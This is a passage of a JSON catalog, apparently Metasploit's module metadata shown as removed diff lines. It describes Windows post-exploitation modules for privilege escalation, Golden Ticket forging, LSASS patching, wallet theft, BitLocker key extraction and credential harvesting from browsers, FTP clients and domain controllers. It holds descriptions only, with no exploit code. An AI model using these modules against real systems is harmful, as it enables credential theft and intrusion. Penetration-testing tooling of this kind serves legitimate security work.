"/modules/post/windows/escalate/getsystem.rb", - "is_install_path": true, - "ref_name": "windows/escalate/getsystem", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Named Pipe Impersonation", - "Token Duplication", - "RPCSS", - "PrintSpooler", - "EFSRPC", - "EfsPotato" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/golden_ticket": { - "name": "Windows Escalate Golden Ticket", - "fullname": "post/windows/escalate/golden_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. 
By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.", - "references": [ - "URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/golden_ticket.rb", - "is_install_path": true, - "ref_name": "windows/escalate/golden_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/ms10_073_kbdlayout": { - "name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation", - "fullname": "post/windows/escalate/ms10_073_kbdlayout", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-12", - "type": "post", - "author": [ - "Ruben Santamarta", - "jduck " - ], - "description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. 
By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.", - "references": [ - "OSVDB-68552", - "CVE-2010-2743", - "MSB-MS10-073", - "URL-https://web.archive.org/web/20160308010201/http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1", - "EDB-15985" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", - "is_install_path": true, - "ref_name": "windows/escalate/ms10_073_kbdlayout", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/screen_unlock": { - "name": "Windows Escalate Locked Desktop Unlocker", - "fullname": "post/windows/escalate/screen_unlock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "L4teral ", - "Metlstorm" - ], - "description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. 
This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.", - "references": [ - "URL-http://www.storm.net.nz/projects/16" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/screen_unlock.rb", - "is_install_path": true, - "ref_name": "windows/escalate/screen_unlock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/unmarshal_cmd_exec": { - "name": "Windows unmarshal post exploitation", - "fullname": "post/windows/escalate/unmarshal_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-08-05", - "type": "post", - "author": [ - "Nicolas Joly", - "Matthias Kaiser", - "Sanjay Gondaliya", - "Pratik Shah " - ], - "description": "This module exploits a local privilege escalation bug which exists\n in Microsoft COM for Windows when it fails to properly handle serialized objects.", - "references": [ - "CVE-2018-0824", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824", - "URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn", - "EDB-44906" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/escalate/unmarshal_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - 
"artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ad_to_sqlite": { - "name": "AD Computer, Group and Recursive User Membership to Local SQLite DB", - "fullname": "post/windows/gather/ad_to_sqlite", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ad_to_sqlite.rb", - "is_install_path": true, - "ref_name": "windows/gather/ad_to_sqlite", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/arp_scanner": { - "name": "Windows Gather ARP Scanner", - "fullname": "post/windows/gather/arp_scanner", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will perform an ARP scan for a given IP range through a\n Meterpreter session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/arp_scanner.rb", - "is_install_path": true, - "ref_name": "windows/gather/arp_scanner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - 
"SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/avast_memory_dump": { - "name": "Avast AV Memory Dumping Utility", - "fullname": "post/windows/gather/avast_memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "DLL_Cool_J" - ], - "description": "This module leverages an Avast Anti-Virus memory dump utility that is shipped\n by default with Avast Anti-Virus Home software suite.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/avast_memory_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/avast_memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bitcoin_jacker": { - "name": "Windows Gather Bitcoin Wallet", - "fullname": "post/windows/gather/bitcoin_jacker", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "illwill ", - "todb " - ], - "description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. 
Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/bitcoin_jacker.rb", - "is_install_path": true, - "ref_name": "windows/gather/bitcoin_jacker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bitlocker_fvek": { - "name": "Bitlocker Master Key (FVEK) Extraction", - "fullname": "post/windows/gather/bitlocker_fvek", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Danil Bazin " - ], - "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n or can be generated, dump the Bitlocker master key (FVEK)", - "references": [ - "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc", - "URL-https://web.archive.org/web/20170914195545/http://www.hsc.fr/ressources/outils/dislocker/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-03 12:57:40 +0000", - "path": "/modules/post/windows/gather/bitlocker_fvek.rb", - "is_install_path": true, - "ref_name": "windows/gather/bitlocker_fvek", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bloodhound": { - "name": 
"BloodHound Ingestor", - "fullname": "post/windows/gather/bloodhound", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h4ng3r ", - "h00die" - ], - "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more.\n With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly\n identify within an Active Directory environment.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/bloodhound.rb", - "is_install_path": true, - "ref_name": "windows/gather/bloodhound", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "sharphound" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/cachedump": { - "name": "Windows Gather Credential Cache Dump", - "fullname": "post/windows/gather/cachedump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Maurizio Agazzini ", - "mubix " - ], - "description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. 
The default setting on Windows is to store\n the last ten successful logins.", - "references": [ - "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/cachedump.rb", - "is_install_path": true, - "ref_name": "windows/gather/cachedump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/checkvm": { - "name": "Windows Gather Virtual Environment Detection", - "fullname": "post/windows/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Aaron Soto " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n and Parallels.", - "references": [ - "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf", - "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf", - "URL-https://evasions.checkpoint.com/techniques/registry.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "windows/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/adi_irc": { - "name": "Adi IRC credential gatherer", - "fullname": "post/windows/gather/credentials/adi_irc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on AdiIRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/adi_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/adi_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/aim": { - "name": "Aim credential gatherer", - "fullname": "post/windows/gather/credentials/aim", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Aim credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/aim.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/aim", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/avira_password": { - "name": "Windows Gather Avira Password Extraction", - "fullname": "post/windows/gather/credentials/avira_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Robert Kugler / robertchrk" - ], - "description": "This module extracts the weakly hashed password\n which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/avira_password.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/avira_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - 
"crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/bulletproof_ftp": { - "name": "Windows Gather BulletProof FTP Client Saved Password Extraction", - "fullname": "post/windows/gather/credentials/bulletproof_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "juan vazquez " - ], - "description": "This module extracts information from BulletProof FTP Bookmarks files and store\n retrieved credentials in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/bulletproof_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/carotdav_ftp": { - "name": "CarotDAV credential gatherer", - "fullname": "post/windows/gather/credentials/carotdav_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on CarotDAV FTP Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/carotdav_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/chrome": { - "name": "Chrome credential gatherer", - "fullname": "post/windows/gather/credentials/chrome", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Chrome in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/chrome.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/chrome", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/comodo": { - "name": "Comodo credential gatherer", - "fullname": "post/windows/gather/credentials/comodo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Comodo on a remote Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/comodo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/comodo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/coolnovo": { - "name": "Coolnovo credential gatherer", - "fullname": "post/windows/gather/credentials/coolnovo", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Coolnovo credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/coolnovo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/coolnovo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/coreftp": { - "name": "Windows Gather CoreFTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/coreftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. 
They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/coreftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/coreftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/credential_collector": { - "name": "Windows Gather Credential Collector", - "fullname": "post/windows/gather/credentials/credential_collector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "tebo " - ], - "description": "This module harvests credentials found on the host and stores them in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/credential_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/credential_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/digsby": { - "name": "Digsby credential gatherer", - "fullname": "post/windows/gather/credentials/digsby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - 
"Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Digsby credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/digsby.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/digsby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/domain_hashdump": { - "name": "Windows Domain Controller Hashdump", - "fullname": "post/windows/gather/credentials/domain_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. 
It saves all of the captured password\n hashes, including historical ones.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/domain_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/dynazip_log": { - "name": "Windows Gather DynaZIP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/dynazip_log", - "aliases": [], - "rank": 300, - "disclosure_date": "2001-03-27", - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 
98 and Windows Me.", - "references": [ - "CVE-2001-0152", - "MSB-MS01-019", - "PACKETSTORM-24543", - "URL-https://support.microsoft.com/en-us/kb/265131" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/dynazip_log.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/dynazip_log", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/dyndns": { - "name": "Windows Gather DynDNS Client Password Extractor", - "fullname": "post/windows/gather/credentials/dyndns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shubham Dawra ", - "sinn3r " - ], - "description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decode the password field. 
The original copy of the config file is also\n saved to disk.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/dyndns.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/dyndns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_cred_store": { - "name": "Windows Gather Credential Store Enumeration and Decryption Module", - "fullname": "post/windows/gather/credentials/enum_cred_store", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. 
It cannot decrypt Domain Network Passwords, but will\n display the username and location.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_cred_store", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_laps": { - "name": "Windows Gather Credentials Local Administrator Password Solution", - "fullname": "post/windows/gather/credentials/enum_laps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_laps.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_laps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/enum_picasa_pwds": { - "name": 
